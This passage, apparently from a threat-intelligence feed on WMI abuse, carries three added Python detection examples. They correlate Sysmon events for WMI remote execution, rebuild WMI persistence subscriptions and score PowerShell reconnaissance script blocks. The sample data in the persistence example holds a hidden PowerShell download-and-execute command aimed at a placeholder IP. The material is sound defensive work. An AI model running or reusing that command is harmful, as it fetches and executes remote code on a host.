target environment, enabling them to tailor their attacks for maximum impact. This can lead to successful privilege escalation, lateral movement, data exfiltration, or ransomware deployment. Organizations that fail to detect and prevent reconnaissance activities are at a higher risk of experiencing significant data breaches and financial losses. The Maze ransomware group, Industroyer2, and LockBit ransomware have been observed using similar reconnaissance techniques.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable PowerShell Script Block Logging on all endpoints to capture the necessary data for detection (\u003ca href=\"https://help.splunk.com/en/security-offerings/splunk-user-behavior-analytics/get-data-in/5.4.1/add-other-data-to-splunk-uba/configure-powershell-logging-to-see-powershell-anomalies-in-splunk-uba.\"\u003ePowerShell Script Block Logging 4104\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious WMI Reconnaissance via PowerShell\u003c/code\u003e to identify PowerShell scripts querying sensitive WMI classes.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the user and process context to determine potential malicious intent.\u003c/li\u003e\n\u003cli\u003eReview and tune the \u003ccode\u003eRecon Using WMI Class\u003c/code\u003e detection filter (\u003ccode\u003erecon_using_wmi_class_filter\u003c/code\u003e) to reduce false positives in your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-wmi-reconnaissance/","summary":"Detection of suspicious PowerShell activity using Windows Management Instrumentation (WMI) to gather system information, indicative of reconnaissance efforts by adversaries potentially leading to further exploitation or lateral movement.","title":"Suspicious PowerShell 
Reconnaissance via WMI Queries","url":"https://feed.craftedsignal.io/briefs/2024-01-wmi-reconnaissance/"}],"language":"en","title":"CraftedSignal Threat Feed — Wmi","version":"https://jsonfeed.org/version/1.1"}
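The attack chains in the briefs "WMI Incoming Lateral Movement", "Stealthy WMI Lateral Movement via StealthyWMIExec.py" and "Suspicious Enumeration Commands Spawned via WMIPrvSE" all end the same way on the target: WmiPrvSE.exe becomes the parent of the attacker's process. The following Python is an added example, not code from the feed, the Reddit post, or any vendor rule, that runs that correlation over constructed Sysmon-style events: an accepted inbound connection to port 135 on svchost.exe (Event ID 3) followed within a window by a WmiPrvSE.exe child (Event ID 1), with an allowlist for management hosts, plus a standalone check for enumeration tools spawned by WmiPrvSE.exe. The window, the allowlist, the tool list and the sample event values are this example's assumptions.

```python
"""Correlate Sysmon events to flag process execution driven by WMI.

Added example, not code from the feed or from any of the briefs' Sigma rules.
Events are dicts carrying the Sysmon field names for Event ID 3
(NetworkConnect) and Event ID 1 (ProcessCreate); the sample events, the
correlation window and the management-host allowlist are constructed here.

Two findings are produced:
  * remote execution: a child of WmiPrvSE.exe that follows, within WINDOW,
    an accepted inbound TCP/135 connection to svchost.exe on the same host
    from a source that is not on the allowlist;
  * enumeration: WmiPrvSE.exe spawning a known discovery tool, whatever
    the origin of the request.
"""
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)                 # assumed correlation window
ADMIN_SOURCES = {"10.0.0.5"}                   # assumed management hosts
RECON_TOOLS = {"net.exe", "net1.exe", "ipconfig.exe", "systeminfo.exe",
               "whoami.exe", "nltest.exe", "tasklist.exe", "quser.exe"}


def _when(ev):
    # Sysmon UtcTime looks like "2024-01-03 12:00:00.123"
    return datetime.fromisoformat(ev["UtcTime"])


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return [(host, child image, reason)] for every suspicious WmiPrvSE child."""
    inbound = {}                               # host -> [(time, source ip)]
    findings = []
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        host = ev["Computer"]
        if ev["EventID"] == 3:
            accepted = str(ev["Initiated"]).lower() == "false"
            if (accepted and int(ev["DestinationPort"]) == 135
                    and _basename(ev["Image"]) == "svchost.exe"
                    and ev["SourceIp"] not in ADMIN_SOURCES):
                inbound.setdefault(host, []).append((_when(ev), ev["SourceIp"]))
        elif ev["EventID"] == 1 and _basename(ev["ParentImage"]) == "wmiprvse.exe":
            child = _basename(ev["Image"])
            now = _when(ev)
            recent = [src for when, src in inbound.get(host, [])
                      if timedelta(0) <= now - when <= WINDOW]
            if recent:
                findings.append((host, child, f"remote WMI execution from {recent[-1]}"))
            if child in RECON_TOOLS:
                findings.append((host, child, "enumeration tool spawned by WmiPrvSE.exe"))
    return findings


# Constructed sample telemetry: one allowlisted admin session, one remote
# execution from an unknown workstation, one local enumeration, one child
# that arrives long after the inbound connection, one unrelated process.
SYS = "C:\\Windows\\System32\\"
SAMPLE_EVENTS = [
    {"EventID": 3, "Computer": "WS01", "UtcTime": "2024-01-03 12:00:00.000", "Initiated": "false",
     "Image": SYS + "svchost.exe", "SourceIp": "10.0.0.5", "DestinationPort": 135},
    {"EventID": 1, "Computer": "WS01", "UtcTime": "2024-01-03 12:00:05.000",
     "ParentImage": SYS + "wbem\\WmiPrvSE.exe", "Image": SYS + "cmd.exe"},
    {"EventID": 3, "Computer": "WS02", "UtcTime": "2024-01-03 12:01:00.000", "Initiated": "false",
     "Image": SYS + "svchost.exe", "SourceIp": "192.168.1.77", "DestinationPort": 135},
    {"EventID": 1, "Computer": "WS02", "UtcTime": "2024-01-03 12:01:10.000",
     "ParentImage": SYS + "wbem\\WmiPrvSE.exe", "Image": SYS + "WindowsPowerShell\\v1.0\\powershell.exe"},
    {"EventID": 1, "Computer": "WS03", "UtcTime": "2024-01-03 12:02:00.000",
     "ParentImage": SYS + "wbem\\WmiPrvSE.exe", "Image": SYS + "net.exe"},
    {"EventID": 1, "Computer": "WS02", "UtcTime": "2024-01-03 12:09:00.000",
     "ParentImage": SYS + "wbem\\WmiPrvSE.exe", "Image": SYS + "cmd.exe"},
    {"EventID": 1, "Computer": "WS01", "UtcTime": "2024-01-03 12:10:00.000",
     "ParentImage": "C:\\Windows\\explorer.exe", "Image": SYS + "notepad.exe"},
]

if __name__ == "__main__":
    for host, child, reason in detect(SAMPLE_EVENTS):
        print(f"{host}: {child} - {reason}")
```

The allowlisted session on WS01 and the late cmd.exe on WS02 are deliberately silent: the first is what the "create exceptions for known administrative IP addresses" recommendation means in practice, the second shows why the window matters, since a WmiPrvSE.exe child minutes after an unrelated RPC connection is not evidence of remote execution.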
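The two persistence briefs above, "Persistence via WMI Event Subscription" and "Detect Suspicious WMI Event Subscription Creation for Persistence", both come down to the filter, consumer and binding triple. As an added example, not the Elastic rule or the Sigma rule they cite, this Python reconstructs the triple from Sysmon Event IDs 19, 20 and 21 so that an alert on the binding carries the trigger query and the payload. The event field names follow Sysmon's schema; the Type string "Command Line", the sample subscriptions and the user names are this example's own assumptions.

```python
"""Rebuild WMI permanent event subscriptions from Sysmon WMI events.

Added example, not the Sigma rule or Elastic logic the briefs refer to.
Sysmon emits three events when a subscription is written via
IWbemServices::PutInstance:
  19 WmiEventFilter            fields Name, EventNamespace, Query
  20 WmiEventConsumer          fields Name, Type, Destination
  21 WmiEventConsumerToFilter  fields Consumer, Filter (WMI object paths)
The field names follow Sysmon's schema; the sample events below are
constructed. The correlator keys on the binding (21), because only a bound
consumer ever fires, and joins it back to the filter query and the consumer
payload so the analyst gets trigger and action in one finding. Bindings whose
filter or consumer was not seen (out-of-order delivery, or events dropped) are
still reported, marked incomplete.
"""
import re

PAYLOAD_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}
# A WMI object path as Sysmon logs it, e.g. CommandLineEventConsumer.Name="Updater"
_REF = re.compile(r'^(\w+)\.Name="([^"]*)"$')


def parse_ref(ref):
    """Split 'Class.Name="value"' into (class, name)."""
    m = _REF.match(ref.strip())
    if not m:
        raise ValueError(f"unrecognised WMI object path: {ref!r}")
    return m.group(1), m.group(2)


def correlate(events):
    """Return one finding per binding to a payload-carrying consumer."""
    filters, consumers, findings = {}, {}, []
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        if ev.get("Operation", "Created") != "Created":
            continue                       # deletions do not add persistence
        host, eid = ev["Computer"], ev["EventID"]
        if eid == 19:
            filters[(host, ev["Name"])] = ev
        elif eid == 20:
            consumers[(host, ev["Name"])] = ev
        elif eid == 21:
            cls, cname = parse_ref(ev["Consumer"])
            _, fname = parse_ref(ev["Filter"])
            if cls not in PAYLOAD_CONSUMERS:
                continue                   # e.g. NTEventLogEventConsumer, LogFileEventConsumer
            flt = filters.get((host, fname))
            con = consumers.get((host, cname))
            findings.append({
                "host": host,
                "user": ev["User"],
                "consumer_class": cls,
                "consumer_name": cname,
                "filter_name": fname,
                "query": flt["Query"] if flt else None,
                "payload": con["Destination"] if con else None,
                "complete": flt is not None and con is not None,
            })
    return findings


# Constructed sample: an uptime-triggered malicious subscription, the default
# SCM event-log subscription that ships with Windows, and a binding for which
# the filter and consumer events were never seen.
SAMPLE_EVENTS = [
    {"EventID": 19, "Computer": "SRV01", "UtcTime": "2024-01-03 10:00:01.000", "Operation": "Created",
     "User": "SRV01\\Administrator", "Name": "Updater", "EventNamespace": "root\\cimv2",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "
              "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240"},
    {"EventID": 20, "Computer": "SRV01", "UtcTime": "2024-01-03 10:00:02.000", "Operation": "Created",
     "User": "SRV01\\Administrator", "Name": "Updater", "Type": "Command Line",
     "Destination": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.7/a')\""},
    {"EventID": 21, "Computer": "SRV01", "UtcTime": "2024-01-03 10:00:03.000", "Operation": "Created",
     "User": "SRV01\\Administrator", "Consumer": 'CommandLineEventConsumer.Name="Updater"',
     "Filter": '__EventFilter.Name="Updater"'},
    {"EventID": 21, "Computer": "SRV01", "UtcTime": "2024-01-03 10:05:00.000", "Operation": "Created",
     "User": "NT AUTHORITY\\SYSTEM", "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"',
     "Filter": '__EventFilter.Name="SCM Event Log Filter"'},
    {"EventID": 21, "Computer": "SRV02", "UtcTime": "2024-01-03 10:10:00.000", "Operation": "Created",
     "User": "SRV02\\svc_backup", "Consumer": 'ActiveScriptEventConsumer.Name="Cleanup"',
     "Filter": '__EventFilter.Name="Cleanup"'},
]

if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f"{f['host']} {f['consumer_class']} '{f['consumer_name']}' bound to "
              f"'{f['filter_name']}' by {f['user']} complete={f['complete']}")
```

Keying on the binding rather than on consumer creation is deliberate: an attacker can stage the consumer and filter well ahead of time, and an analyst who alerts on Event ID 20 alone sees a payload without its trigger. The incomplete finding for SRV02 is the case to keep, not drop; it usually means the subscription was written before Sysmon was installed or the earlier events were lost, and the live objects should be pulled from root\subscription on the host.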
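For the brief "Suspicious PowerShell Reconnaissance via WMI Queries", the following is an added example, not the Splunk analytic or its filter macro, that extracts the WMI classes named in a 4104 script block and scores the block against the class list the brief gives. The regexes, the sample script blocks and the threshold are assumptions; the class list is the brief's.

```python
"""Flag PowerShell script blocks (Event ID 4104) that query WMI for system profile data.

Added example, not the Splunk analytic the brief describes. The class list is
the one given in the brief; the patterns, the sample script blocks and the
threshold are this example's own assumptions. Matching is case-insensitive
because PowerShell and WQL are, and the same class can be reached through
Get-WmiObject, its gwmi alias, Get-CimInstance, a raw WQL query, or the
[wmiclass] accelerator, so each of those spellings is covered.
"""
import re

RECON_CLASSES = {
    "Win32_Bios", "Win32_OperatingSystem", "Win32_Processor", "Win32_ComputerSystem",
    "Win32_PnPEntity", "Win32_ShadowCopy", "Win32_DiskDrive", "Win32_PhysicalMemory",
    "Win32_BaseBoard", "Win32_DisplayConfiguration",
}
_CANON = {c.lower(): c for c in RECON_CLASSES}

# Each pattern captures the class name in group 1.
_PATTERNS = [
    # Get-WmiObject Win32_Bios / gwmi -Class Win32_Bios / Get-CimInstance -ClassName Win32_Bios
    re.compile(r"\b(?:Get-WmiObject|gwmi|Get-CimInstance|gcim)\s+(?:-Class(?:Name)?\s+)?(Win32_\w+)", re.I),
    # -Query "SELECT * FROM Win32_Bios", or a ManagementObjectS earcher WQL string
    re.compile(r"\bFROM\s+(Win32_\w+)", re.I),
    # [wmiclass]"root\cimv2:Win32_Bios" or [wmiclass]'Win32_Bios'
    re.compile(r"\[wmiclass\]\s*['\"]?(?:[^'\"\s]*:)?(Win32_\w+)", re.I),
]


def wmi_classes(script_block):
    """Every Win32_* class the script block names, in its original spelling."""
    return {m.group(1) for pat in _PATTERNS for m in pat.finditer(script_block)}


def recon_classes(script_block):
    """The subset of those classes that are on the reconnaissance list."""
    return {_CANON[c.lower()] for c in wmi_classes(script_block) if c.lower() in _CANON}


def is_recon(script_block, threshold=1):
    """True when at least `threshold` distinct recon classes are queried.

    Raising the threshold trades recall for precision: inventory scripts that
    touch a single class are common, scripts that profile BIOS, OS, CPU and
    disk in one go are rarely benign.
    """
    return len(recon_classes(script_block)) >= threshold


# Constructed script blocks standing in for the ScriptBlockText of 4104 events.
SAMPLE_BLOCKS = {
    "profiler": "$b = Get-WmiObject -Class Win32_Bios; $o = gwmi Win32_OperatingSystem; "
                "$c = Get-CimInstance -Query 'SELECT Name FROM Win32_Processor'; "
                "$d = [wmiclass]'root\\cimv2:Win32_DiskDrive'",
    "service_check": "Get-WmiObject -Class Win32_Service | Where-Object { $_.State -eq 'Running' }",
    "lowercase": "get-ciminstance -classname win32_computersystem | select Model",
}

if __name__ == "__main__":
    for name, text in SAMPLE_BLOCKS.items():
        print(f"{name}: recon={is_recon(text, threshold=2)} classes={sorted(recon_classes(text))}")
```

The distinct-class count is the useful triage signal: the brief's recommendation to tune the filter for your environment amounts, in this form, to choosing the threshold and exempting the script blocks your inventory tooling is known to emit.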